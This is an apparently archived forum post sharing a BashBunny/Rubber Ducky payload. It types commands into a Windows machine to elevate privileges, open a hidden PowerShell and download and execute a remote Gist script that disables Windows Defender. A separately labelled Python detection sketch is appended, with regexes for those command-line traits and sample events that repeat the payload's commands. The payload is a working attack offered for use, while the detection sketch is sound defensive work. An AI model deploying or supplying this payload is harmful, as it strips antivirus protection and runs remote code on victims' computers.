
[PAYLOAD] DisableD3f3nd3r


InfoSecREDD


DisableD3f3nd3r

This payload was created out of frustration with people asking how to disable Windows Defender via BashBunny or Rubber-Ducky. I have released payloads for both devices. This is just a basic PowerShell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender".

Source Code of the PowerShell Script:
https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc

The Payload:
 

#!/bin/bash
#
# Title:         Disable D3f3nd3r (BashBunny)
# Description:   This Payload disables Windows Defender using Powershell, Works also for the Hak5
#                Rubber Ducky or any HID device that supports Quacking.
# Author:        REDD of Private-Locker
# Version:       1.0
# Category:      Disable Security
# Target:        Windows
#
# Source:        https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1
#


LED SETUP
ATTACKMODE HID

LED ATTACK
RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\""
Q LEFTARROW;
Q ENTER;
Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\""
Q ENTER;
sleep 1;
Q STRING "exit";
Q ENTER;

LED FINISH


 


Archived

This topic is now archived and is closed to further replies.
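
Added example, not part of the original post or the author's script: a detection sketch for the command-line traits this payload leaves in process-creation logs (hidden window, execution-policy bypass, `runAs` elevation, `IEX`/`DownloadString` cradle), including the abbreviated parameter spellings PowerShell accepts. The event dictionaries, rule names, alert threshold and the `example.invalid` URL are assumptions made for illustration.

```python
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so each
# pattern matches abbreviated spellings (-Exec, -ex, -ep) as well as the full one.
RULES = {
    "no_profile": re.compile(r"\s-nop[a-z]*\b", re.I),
    "non_interactive": re.compile(r"\s-noni[a-z]*\b", re.I),
    "hidden_window": re.compile(r"\s-w(?:i[a-z]*)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"\s-e(?:p|x[a-z]*)\s+bypass\b", re.I),
    "elevation": re.compile(r"\bstart-process\b.*-verb\s+runas\b", re.I | re.S),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\bdownloadstring\b", re.I | re.S),
}
HOST = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def indicators(cmdline):
    """Return the sorted names of the rules a PowerShell command line matches."""
    if not HOST.search(cmdline):
        return []
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(events, threshold=2):
    """Return (pid, hits) for events that match at least `threshold` rules."""
    alerts = []
    for ev in events:
        hits = indicators(ev["cmdline"])
        if len(hits) >= threshold:
            alerts.append((ev["pid"], hits))
    return alerts


# Constructed process-creation events (assumed fields); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 4100, "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass -c "
                             "\"Start-Process cmd -A '/t:4f'-Verb runAs\""},
    {"pid": 4188, "cmdline": "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object "
                             "Net.WebClient).DownloadString('https://example.invalid/s.ps1');\""},
    {"pid": 5020, "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"pid": 5044, "cmdline": "powershell -ExecutionPolicy Bypass -File deploy.ps1"},
    {"pid": 5101, "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```

The threshold of two keeps single-flag administrative invocations, such as a scheduled script run with `-NoProfile`, out of the alert list while still catching both stages of the keystroke-injected sequence.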
